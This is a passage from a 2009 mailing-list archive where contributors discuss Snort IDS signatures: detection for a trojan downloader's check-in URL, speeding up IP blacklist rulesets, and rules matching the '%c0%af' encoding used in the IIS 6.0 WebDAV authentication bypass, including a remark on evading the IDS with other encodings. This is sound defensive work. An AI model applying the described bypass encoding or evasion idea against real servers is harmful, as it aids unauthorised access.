Subject: [Emerging-Sigs] reference for sid:2008134
In-Reply-To: <4A130A93.1050702@jonkmans.com>
References: <F76535BB-0C51-4A2D-9999-CAB9CE31C7B3@auckland.ac.nz>
	<4A130A93.1050702@jonkmans.com>
Message-ID: <1242762077.4200.7.camel@localhost>

On Tue, 2009-05-19 at 15:37 -0400, Matt Jonkman wrote:
> Got it, thanks Russell!

I didn't add it since I wasn't sure if that really applies to that sig
("General" downloader). Looks like it won't be general anymore :)

-Frank



-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090519/86e5acb2/attachment.bin

From jonkman at jonkmans.com  Tue May 19 16:00:05 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 19 May 2009 16:00:05 -0400
Subject: [Emerging-Sigs] 2008546 = emo loader
In-Reply-To: <839aec700905151815v243086c4oc2ec520cac48b360@mail.gmail.com>
References: <839aec700905151815v243086c4oc2ec520cac48b360@mail.gmail.com>
Message-ID: <4A130FC5.5040607@jonkmans.com>

Ya, we never did put part 2 up. Or removed it, or whatever. Adjusting
the name and adding the reference.

Thanks Darren!

matt

Darren Spruell wrote:
> Existing rule:
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> Downloader.vr Checkin part 1 of 2"; flow:established,to_server;
> content:"GET "; depth:4; uricontent:".php"; uricontent:"v=";
> uricontent:"&rs="; uricontent:"&n="; uricontent:"&uid=";
> classtype:trojan-activity;
> reference:url,doc.emergingthreats.net/2008546;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General;
> sid:2008546; rev:3;)
> 
> This is commonly known as Emo loader (e.g.
> http://www.malwaredomainlist.com/mdl.php?search=emo+&colsearch=All&quantity=50),
> if a rule message update is OK.
> 
> Also, by the message text, is there supposed to be an accompanying
> part 2 of 2 anywhere?
> 

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From emerging at emergingthreats.net  Tue May 19 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Tue, 19 May 2009 16:00:12 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090519200012.C1F944504D@goliath.jonkmans.com>


[***] Results from Oinkmaster started Tue May 19 16:00:12 2009 [***]

[///]     Modified active rules:     [///]

 2008134 - ET TROJAN Common Downloader Install Count Tracking URL (partner) (emerging-virus.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (3):
        2008134 || ET TROJAN Common Downloader Install Count Tracking URL (partner) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,www.threatexpert.com/report.aspx?md5=ea70e0971cc490a15e53d24ad6564403 || url,doc.emergingthreats.net/2008134
        2500144 || ET COMPROMISED Known Compromised or Hostile Host Traffic (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510144 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (3):
        2008134 || ET TROJAN Common Downloader Install Count Tracking URL (partner) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,www.threatexpert.com/report.aspx?md5=ea70e0971cc490a15e53d24ad6564403 || url,doc.emergingthreats.net/2008134
        2500144 || ET COMPROMISED Known Compromised or Hostile Host Traffic (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510144 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (1):
        2008134 || ET TROJAN Common Downloader Install Count Tracking URL (partner) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2008134

     -> Removed from emerging-sid-msg.map.txt (1):
        2008134 || ET TROJAN Common Downloader Install Count Tracking URL (partner) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2008134


From jonkman at jonkmans.com  Tue May 19 16:58:41 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 19 May 2009 16:58:41 -0400
Subject: [Emerging-Sigs] IP List rulesets
Message-ID: <4A131D81.3040907@jonkmans.com>

I've updated the scripts that generate the IP lists rulesets to separate
into TCP and UDP rulesets. This has shown in a number of tests (contrary
to expectations) to have a significant performance improvement.

Please test them out and let me know both if they're accurate and if you
see any performance gains!

Thanks

Matt

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From eslerj at gmail.com  Tue May 19 17:01:40 2009
From: eslerj at gmail.com (Joel Esler)
Date: Tue, 19 May 2009 17:01:40 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A131D81.3040907@jonkmans.com>
References: <4A131D81.3040907@jonkmans.com>
Message-ID: <314cf0830905191401x4af6045cu3763917297753633@mail.gmail.com>

http://securitysauce.blogspot.com/2009/05/ip-blacklisting-for-snort-2841.html

J

On Tue, May 19, 2009 at 4:58 PM, Matt Jonkman <jonkman at jonkmans.com> wrote:

> I've updated the scripts that generate the IP lists rulesets to separate
> into TCP and UDP rulesets. This has shown in a number of tests (contrary
> to expectations) to have a significant performance improvement.
>
> Please test them out and let me know both if they're accurate and if you
> see any performance gains!
>
> Thanks
>
> Matt
>
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090519/dbcebef5/attachment-0001.html

From jonkman at jonkmans.com  Tue May 19 17:14:18 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 19 May 2009 17:14:18 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <314cf0830905191401x4af6045cu3763917297753633@mail.gmail.com>
References: <4A131D81.3040907@jonkmans.com>
	<314cf0830905191401x4af6045cu3763917297753633@mail.gmail.com>
Message-ID: <4A13212A.9010100@jonkmans.com>

Thanks Joel. Definitely good stuff, thanks Marty!

Think that'll end up going into the main tree?

Matt

Joel Esler wrote:
> http://securitysauce.blogspot.com/2009/05/ip-blacklisting-for-snort-2841.html
> 
> J
> 
> On Tue, May 19, 2009 at 4:58 PM, Matt Jonkman <jonkman at jonkmans.com
> <mailto:jonkman at jonkmans.com>> wrote:
> 
>     I've updated the scripts that generate the IP lists rulesets to separate
>     into TCP and UDP rulesets. This has shown in a number of tests (contrary
>     to expectations) to have a significant performance improvement.
> 
>     Please test them out and let me know both if they're accurate and if you
>     see any performance gains!
> 
>     Thanks
> 
>     Matt
> 
>     --
>     --------------------------------------------
>     Matthew Jonkman
>     Emerging Threats
>     Phone 765-429-0398
>     Fax 312-264-0205
>     http://www.emergingthreats.net
>     --------------------------------------------
> 
>     PGP: http://www.jonkmans.com/mattjonkman.asc
> 
> 
>     _______________________________________________
>     Emerging-sigs mailing list
>     Emerging-sigs at emergingthreats.net
>     <mailto:Emerging-sigs at emergingthreats.net>
>     http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 
> 
> 
> 
> -- 
> joel esler | Sourcefire | gtalk: jesler at sourcefire.com
> <mailto:jesler at sourcefire.com> | 302-223-5974
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From mcholste at gmail.com  Tue May 19 17:14:18 2009
From: mcholste at gmail.com (Martin Holste)
Date: Tue, 19 May 2009 16:14:18 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242761533.4200.4.camel@localhost>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<df9074860905180746h3cfe2590h34e99a9557b9201d@mail.gmail.com>
	<d48bb4250905180811p647b50f0r4f54135a4d506c5f@mail.gmail.com>
	<9255886c0905180901u6abd75abh945c5b281ea08278@mail.gmail.com>
	<1242761533.4200.4.camel@localhost>
Message-ID: <df9074860905191414w15dd479fp74c6707389511257@mail.gmail.com>

I'm still unclear on how any signature dealing with encoded chars should be
written for uricontent with normalization.

On Tue, May 19, 2009 at 2:32 PM, Frank Knobbe <frank at knobbe.us> wrote:

> On Mon, 2009-05-18 at 13:01 -0300, Rodrigo Montoro(Sp0oKeR) wrote:
> > http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html
>
> So is %c0%af the only 16 bit Unicode sequence resulting in a "/"? (i
> doubt it). Is this an issue with Unicode encoding in general or "%c0%af"
> in particular?
>
> Cheers,
> Frank
>
>
> --
> It is said that the Internet is a public utility. As such, it is best
> compared to a sewer. A big, fat pipe with a bunch of crap sloshing
> against your ports.
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090519/2ccf7380/attachment.html

From frank at knobbe.us  Tue May 19 17:20:35 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Tue, 19 May 2009 16:20:35 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <df9074860905191414w15dd479fp74c6707389511257@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<df9074860905180746h3cfe2590h34e99a9557b9201d@mail.gmail.com>
	<d48bb4250905180811p647b50f0r4f54135a4d506c5f@mail.gmail.com>
	<9255886c0905180901u6abd75abh945c5b281ea08278@mail.gmail.com>
	<1242761533.4200.4.camel@localhost>
	<df9074860905191414w15dd479fp74c6707389511257@mail.gmail.com>
Message-ID: <1242768035.4200.28.camel@localhost>

On Tue, 2009-05-19 at 16:14 -0500, Martin Holste wrote:
> I'm still unclear on how any signature dealing with encoded chars
> should be written for uricontent with normalization.

It won't work with uricontent as it normalizes "%c0%af" into "/". So a
content match is in order that can fixate *this particular sequence*
between GET|POST|... and the trailing HTTP/1. Maybe with a pcre assist.

But, if any Unicode that forms a "/" causes this problem (which is my
guess based on the description), then of course this is useless and will
only detect the brain-dead script kiddies using the milw0rm exploit
unchanged.

And even if we create a couple hundred sigs for "/" in all their Unicode
forms.... why not just use a "%xx%xx" that translates into a dot to fly
by the IDS? :]

Cheers,
Frank




-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090519/9224bae9/attachment.bin

From jesler at sourcefire.com  Tue May 19 17:45:15 2009
From: jesler at sourcefire.com (Joel Esler)
Date: Tue, 19 May 2009 17:45:15 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A13212A.9010100@jonkmans.com>
References: <4A131D81.3040907@jonkmans.com>
	<314cf0830905191401x4af6045cu3763917297753633@mail.gmail.com>
	<4A13212A.9010100@jonkmans.com>
Message-ID: <7949F358-7F72-4E89-A98E-98730D7049B1@sourcefire.com>

Marty comments on that very thing in the post of his blog.

--
Joel Esler
Sent from my iDevice

On May 19, 2009, at 5:14 PM, Matt Jonkman <jonkman at jonkmans.com> wrote:

> Thanks Joel. Definitely good stuff, thanks Marty!
>
> Think that'll end up going into the main tree?
>
> Matt
>
> Joel Esler wrote:
>> http://securitysauce.blogspot.com/2009/05/ip-blacklisting-for-snort-2841.html
>>
>> J
>>
>> On Tue, May 19, 2009 at 4:58 PM, Matt Jonkman <jonkman at jonkmans.com
>> <mailto:jonkman at jonkmans.com>> wrote:
>>
>>    I've updated the scripts that generate the IP lists rulesets to  
>> separate
>>    into TCP and UDP rulesets. This has shown in a number of tests  
>> (contrary
>>    to expectations) to have a significant performance improvement.
>>
>>    Please test them out and let me know both if they're accurate  
>> and if you
>>    see any performance gains!
>>
>>    Thanks
>>
>>    Matt
>>
>>    --
>>    --------------------------------------------
>>    Matthew Jonkman
>>    Emerging Threats
>>    Phone 765-429-0398
>>    Fax 312-264-0205
>>    http://www.emergingthreats.net
>>    --------------------------------------------
>>
>>    PGP: http://www.jonkmans.com/mattjonkman.asc
>>
>>
>>    _______________________________________________
>>    Emerging-sigs mailing list
>>    Emerging-sigs at emergingthreats.net
>>    <mailto:Emerging-sigs at emergingthreats.net>
>>    http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>>
>>
>>
>> -- 
>> joel esler | Sourcefire | gtalk: jesler at sourcefire.com
>> <mailto:jesler at sourcefire.com> | 302-223-5974
>>
>>
>> --- 
>> ---------------------------------------------------------------------
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> -- 
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>

From eoin.miller at trojanedbinaries.com  Tue May 19 18:28:21 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Tue, 19 May 2009 18:28:21 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A131D81.3040907@jonkmans.com>
References: <4A131D81.3040907@jonkmans.com>
Message-ID: <4A133285.1060104@trojanedbinaries.com>

Matt,

In our testing/breakup/optimization of the IP List rules
(RBN/BotCC/compromised/DShield), we did this a little differently for
the TCP rules.

Vanilla TCP rule (Example):
alert tcp [<RBN IP LIST>] any -> $HOME_NET any (msg:"ET RBN Known
Russian Business Network IP TCP (1)";
reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork;
threshold: type limit, track by_src, seconds 60, count 1;
classtype:misc-attack; sid:2406000; rev:129;)

Modified TCP rule (Example):
alert tcp $HOME_NET any -> [<RBN IP LIST>] any (flags: S; msg:"ET RBN
Known Russian Business Network IP TCP (1)";
reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork;
threshold: type limit, track by_src, seconds 60, count 1;
classtype:misc-attack; sid:2406000; rev:129;)

The modified rule looks for the TCP SYN flag to be set in addition to
the $HOME_NET to be contacting the RBN's known IP's. This significantly
decreases the processor load because Snort will only compare the SRC/DST
address lists *if* the TCP SYN is set (or so it appears?). When you have
a large $HOME_NET, this appears to become even more important. Also, you
may notice we flipped the flow of traffic from $HOME_NET to the RBN
servers in our rule. This is because for us, we are monitoring NAT'd
hosts behind firewalls and are concerned more with our internal hosts
reaching out and attempting to establish a TCP session to potentially
dangerous sites that are doing drive by/malware hosting/phishing or
reaching out to potential C&C servers hosted by RBN. We are less
concerned with RBN sites attempting to connect in and create TCP
sessions to our clients desktop systems as they are NAT'd behind a firewall.

We also created an additional rule set to cover ICMP communications just
to keep tabs if anything starts communicating over it for some reason.
Again, please note that the SRC/DST have been flipped:

New ICMP rule (Example):
alert icmp $HOME_NET -> [<RBN IP LIST>] (msg:"ET RBN Knwon Russian
Business Network IP ICMP (1)";
reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork;
threshold: type limit, track by_src, seconds 60, count 1;
classtype:misc-attack; sid:2406000; rev:129;)

We benchmarked the old RBN ruleset (which used "alert ip" type rules)
against the new one we created (using "alert tcp" w/TCP SYN flag and
"alert udp") using a 25GB pcap traffic capture.

Rule Types    | Time To Process 25GB of PCAP
----------------------------------------------
alert ip      = 1 hour, 3 minutes, 4 seconds
alert tcp/udp = 11 minutes, 43 seconds

Additionally, the disk could not shove packets fast enough at Snort to
process the alert tcp/udp rule sets. The Snort instance only ran at
about 75% processor utilization during its super short 11 minutes of
processing. The processor was pegged at 100% during the alert ip rules
which took 1 hour. At our client site, we used to have to breakup the
RBN rule list into two separate rule lists/instances of Snort just to
monitor a 300MBit/s link without dropping packets in Snort (compiled
against MMAP LibPcap). This was for the RBN list ONLY. Now we can run
almost all of the IP list rules on a single processor core/instance of
Snort @ 300MBit/s without dropping even 0.01% of packets.

It should be noted we are not running Snort in-line and these sigs
should really be for people running in purely IDS mode. Marty's new
super sweet IP BlackList preproc seems to be the way to go for you that
are running in-line.

--
Eoin Miller
eoin.miller at trojanedbinaries.com

From jonkman at jonkmans.com  Tue May 19 18:52:43 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 19 May 2009 18:52:43 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A133285.1060104@trojanedbinaries.com>
References: <4A131D81.3040907@jonkmans.com>
	<4A133285.1060104@trojanedbinaries.com>
Message-ID: <4A13383B.1000608@jonkmans.com>

Very good point on the Syn flag. I've added that to all of the tcp sigs.
That could alone be a good chunk of the performance gain I'd guess.

On reversing the order, I agree there. I wish I'd originally made these
sigs for home_net -> outside. But I'm hesitant to change it now as many
folks have blocking built on the assumed hostile source.

Matt

Eoin Miller wrote:
> Matt,
> 
> In our testing/breakup/optimization of the IP List rules
> (RBN/BotCC/compromised/DShield), we did this a little differently for
> the TCP rules.
> 
> Vanilla TCP rule (Example):
> alert tcp [<RBN IP LIST>] any -> $HOME_NET any (msg:"ET RBN Known
> Russian Business Network IP TCP (1)";
> reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork;
> threshold: type limit, track by_src, seconds 60, count 1;
> classtype:misc-attack; sid:2406000; rev:129;)
> 
> Modified TCP rule (Example):
> alert tcp $HOME_NET any -> [<RBN IP LIST>] any (flags: S; msg:"ET RBN
> Known Russian Business Network IP TCP (1)";
> reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork;
> threshold: type limit, track by_src, seconds 60, count 1;
> classtype:misc-attack; sid:2406000; rev:129;)
> 
> The modified rule looks for the TCP SYN flag to be set in addition to
> the $HOME_NET to be contacting the RBN's known IP's. This significantly
> decreases the processor load because Snort will only compare the SRC/DST
> address lists *if* the TCP SYN is set (or so it appears?). When you have
> a large $HOME_NET, this appears to become even more important. Also, you
> may notice we flipped the flow of traffic from $HOME_NET to the RBN
> servers in our rule. This is because for us, we are monitoring NAT'd
> hosts behind firewalls and are concerned more with our internal hosts
> reaching out and attempting to establish a TCP session to potentially
> dangerous sites that are doing drive by/malware hosting/phishing or
> reaching out to potential C&C servers hosted by RBN. We are less
> concerned with RBN sites attempting to connect in and create TCP
> sessions to our clients desktop systems as they are NAT'd behind a firewall.
> 
> We also created an additional rule set to cover ICMP communications just
> to keep tabs if anything starts communicating over it for some reason.
> Again, please note that the SRC/DST have been flipped:
> 
> New ICMP rule (Example):
> alert icmp $HOME_NET -> [<RBN IP LIST>] (msg:"ET RBN Knwon Russian
> Business Network IP ICMP (1)";
> reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork;
> threshold: type limit, track by_src, seconds 60, count 1;
> classtype:misc-attack; sid:2406000; rev:129;)
> 
> We benchmarked the old RBN ruleset (which used "alert ip" type rules)
> against the new one we created (using "alert tcp" w/TCP SYN flag and
> "alert udp") using a 25GB pcap traffic capture.
> 
> Rule Types    | Time To Process 25GB of PCAP
> ----------------------------------------------
> alert ip      = 1 hour, 3 minutes, 4 seconds
> alert tcp/udp = 11 minutes, 43 seconds
> 
> Additionally, the disk could not shove packets fast enough at Snort to
> process the alert tcp/udp rule sets. The Snort instance only ran at
> about 75% processor utilization during its super short 11 minutes of
> processing. The processor was pegged at 100% during the alert ip rules
> which took 1 hour. At our client site, we used to have to breakup the
> RBN rule list into two separate rule lists/instances of Snort just to
> monitor a 300MBit/s link without dropping packets in Snort (compiled
> against MMAP LibPcap). This was for the RBN list ONLY. Now we can run
> almost all of the IP list rules on a single processor core/instance of
> Snort @ 300MBit/s without dropping even 0.01% of packets.
> 
> It should be noted we are not running Snort in-line and these sigs
> should really be for people running in purely IDS mode. Marty's new
> super sweet IP BlackList preproc seems to be the way to go for you that
> are running in-line.
> 
> --
> Eoin Miller
> eoin.miller at trojanedbinaries.com

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From jgimer at gmail.com  Tue May 19 19:48:48 2009
From: jgimer at gmail.com (Joshua Gimer)
Date: Tue, 19 May 2009 17:48:48 -0600
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
Message-ID: <cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>

Here are some generic rules that I wrote:

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
Auth Bypass - GET METHOD"; pcre:"/GET.*%..%.*HTTP/Bi";
pcre:"/Translate: *f/i";
reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
Auth Bypass - PROPFIND METHOD"; pcre:"/PROPFIND.*%..%.*HTTP/Bi";
reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000005;
rev:1;)

There are probably better/more efficient ways of writing these, but
thought that I would give it a shot.

Josh

On Sat, May 16, 2009 at 3:13 PM, Nick Randolph <randolphdavidn at gmail.com> wrote:
> I'm submitting this for the recent IIS 6.0 vulnerability
> http://isc.sans.org/diary.html?storyid=6397
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
> sid:xxxxxx; gid:1; rev:1;)
>
> I also read that "translate: f" was required but the information on
> milw0rm.com did not use that in all 3 examples.
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
Thx
Joshua Gimer

From spooker at gmail.com  Tue May 19 20:02:44 2009
From: spooker at gmail.com (Rodrigo Montoro(Sp0oKeR))
Date: Tue, 19 May 2009 21:02:44 -0300
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com> 
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
Message-ID: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>

http://vrt-sourcefire.blogspot.com/2009/05/snort-protection-against-iis-60-webdav.html

Regards,

On Tue, May 19, 2009 at 8:48 PM, Joshua Gimer <jgimer at gmail.com> wrote:
> Here are some generic rules that I wrote:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> Auth Bypass - GET METHOD"; pcre:"/GET.*%..%.*HTTP/Bi";
> pcre:"/Translate: *f/i";
> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
> rev:1;)
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> Auth Bypass - PROPFIND METHOD"; pcre:"/PROPFIND.*%..%.*HTTP/Bi";
> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000005;
> rev:1;)
>
> There are probably better/more efficient ways of writing these, but
> thought that I would give it a shot.
>
> Josh
>
> On Sat, May 16, 2009 at 3:13 PM, Nick Randolph <randolphdavidn at gmail.com> wrote:
>> I'm submitting this for the recent IIS 6.0 vulnerability
>> http://isc.sans.org/diary.html?storyid=6397
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
>> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
>> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
>> sid:xxxxxx; gid:1; rev:1;)
>>
>> I also read that "translate: f" was required but the information on
>> milw0rm.com did not use that in all 3 examples.
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>
>
>
> --
> Thx
> Joshua Gimer
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
===========================
Rodrigo Montoro (Sp0oKeR)
http://www.spooker.com.br
http://www.snort.org.br
http://www.linkedin.com/in/spooker
===========================

From jgimer at gmail.com  Tue May 19 20:20:13 2009
From: jgimer at gmail.com (Joshua Gimer)
Date: Tue, 19 May 2009 18:20:13 -0600
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
Message-ID: <cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>

Well that it good and all, but if you want something a little more
specific in the alert msg here is a (minimally) optimized GET method
rule:

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
pcre:"/GET.*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
rev:1;)


On Tue, May 19, 2009 at 6:02 PM, Rodrigo Montoro(Sp0oKeR)
<spooker at gmail.com> wrote:
> http://vrt-sourcefire.blogspot.com/2009/05/snort-protection-against-iis-60-webdav.html
>
> Regards,
>
> On Tue, May 19, 2009 at 8:48 PM, Joshua Gimer <jgimer at gmail.com> wrote:
>> Here are some generic rules that I wrote:
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
>> Auth Bypass - GET METHOD"; pcre:"/GET.*%..%.*HTTP/Bi";
>> pcre:"/Translate: *f/i";
>> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
>> rev:1;)
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
>> Auth Bypass - PROPFIND METHOD"; pcre:"/PROPFIND.*%..%.*HTTP/Bi";
>> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000005;
>> rev:1;)
>>
>> There are probably better/more efficient ways of writing these, but
>> thought that I would give it a shot.
>>
>> Josh
>>
>> On Sat, May 16, 2009 at 3:13 PM, Nick Randolph <randolphdavidn at gmail.com> wrote:
>>> I'm submitting this for the recent IIS 6.0 vulnerability
>>> http://isc.sans.org/diary.html?storyid=6397
>>>
>>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
>>> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
>>> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
>>> sid:xxxxxx; gid:1; rev:1;)
>>>
>>> I also read that "translate: f" was required but the information on
>>> milw0rm.com did not use that in all 3 examples.
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>
>>
>>
>> --
>> Thx
>> Joshua Gimer
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>
>
>
> --
> ===========================
> Rodrigo Montoro (Sp0oKeR)
> http://www.spooker.com.br
> http://www.snort.org.br
> http://www.linkedin.com/in/spooker
> ===========================
>



-- 
Thx
Joshua Gimer

From phatbuckett at gmail.com  Tue May 19 21:28:52 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Tue, 19 May 2009 18:28:52 -0700
Subject: [Emerging-Sigs] BManager communication
